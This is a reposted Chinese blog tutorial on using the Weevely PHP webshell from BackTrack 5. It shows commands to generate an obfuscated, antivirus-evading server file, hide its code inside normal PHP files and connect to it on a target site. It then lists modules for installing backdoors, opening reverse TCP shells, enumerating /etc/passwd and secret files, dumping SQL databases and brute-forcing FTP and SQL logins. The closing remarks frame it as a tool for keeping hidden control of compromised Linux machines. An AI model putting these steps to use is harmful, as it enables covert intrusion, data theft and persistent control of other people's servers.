BT5工具之Weevely使用

来源:互联网 发布:清华电子工程系知乎 编辑:程序博客网 时间:2024/06/05 00:12
在BT5里webshell有不少,大家可以自己看看,这里说的是Weevely这个shell,为什么说它呢?这个小东东有点意思,类似于我们常用的“菜刀”,可以说是linux命令版的菜刀了。
 
这里我用的是0.6版本的,BT5自带的是0.5吧,我看版本太低被我给K了,自己装个0.6,据说0.7也出了,多了个代理和端口扫描的功能。。这里不讨论。
 
生成服务端,./weevely.py generate 51cto /tmp/wp-user.php  这句就是生成一个密码是51cto,放在tmp文件夹里,名字是wp-user.php的文件,也就是服务端。注意:密码必须大于等于4位,否则会提示出错。这里你可以找到这个服务端看看里面的代码,是加密的。weevely每次生成的服务端代码的是不一样的这样可以大大逃避杀软的追杀。服务端类似我们常用的一句话。也可以像一句话一样,把服务端里面的代码插入其他正常的PHP文件里,也是可以的。

 

连接服务端,方法:./weevely.py http://XX.XXX.XX.shell.php 密码
返回一个shell。
 
使用ls命令看一下,可以执行简单的命令。

 
得到shell后,按两下Tab键,看到了吧,这是 weevely强大的模块功能。

 
执行以下模块功能命令:systeminfo 呵呵一些系统信息。
注意:执行模块命令的时候必须前面有":"这个冒号,也可以按Tab键。

模块功能:
系统                                
        system.info   //收集系统信息        
文件                                
        file.read        //读文件
        file.upload        //上传本地文件        
        file.check        //检查文件的权限和
        file.enum        //在本地词表的书面枚举远程文件
        file.download        //下载远程二进制/ ASCII文件到本地
SQL                                
        sql.query        //执行SQL查询
        sql.console        //启动SQL控制台
        sql.dump        //获取SQL数据库转储
        sql.summary        //获取SQL数据库中的表和列
后门                                
        backdoor.tcp                //TCP端口后门
        backdoor.install        //安装后门
        backdoor.reverse_tcp        //反弹
枚举                                
        audit.user_files        //在用户家中列举常见的机密文件
        audit.user_web_files        //列举常见的Web文件
        audit.etc_passwd        //枚举/etc/passwd
查找                                
        find.webdir        //查找可写的web目录
        find.perm        //查找权限可读/写/可执行文件和目录
        find.name        //按名称查找文件和目录
        find.suidsgid        //查找SUID / SGID文件和目录
暴破                                
        bruteforce.sql                //暴力破解单一SQL用户                
        bruteforce.sql_users        //暴力破解SQL密码
        bruteforce.ftp               // 暴力破解单一FTP用户        
        bruteforce.ftp_users        //暴力破解FTP密码

其他不全的等各位童鞋test后补全吧。
PS:等待某位大牛写过GUI版,就真的是linux下的菜刀了。
再PS:有人说现在webshell很多,为什么用这个,还是命令行的,太费事啊,我想无论什么东西都有它存在的道理,既然BT5集成了它,估计是在高级入侵时使用的。试想一下,如果你拿了个linux肉鸡,是不是装个后门,后门是不是都是命令控制的(给装VNC估计也有),linux肉鸡能用界面控制的很少,除非你不想活了,既然这样那这个webshell,就可以放在肉鸡上命令控制,来达到隐藏自己的作用。说的不对的地方多多包涵。。
0 0
原创粉丝点击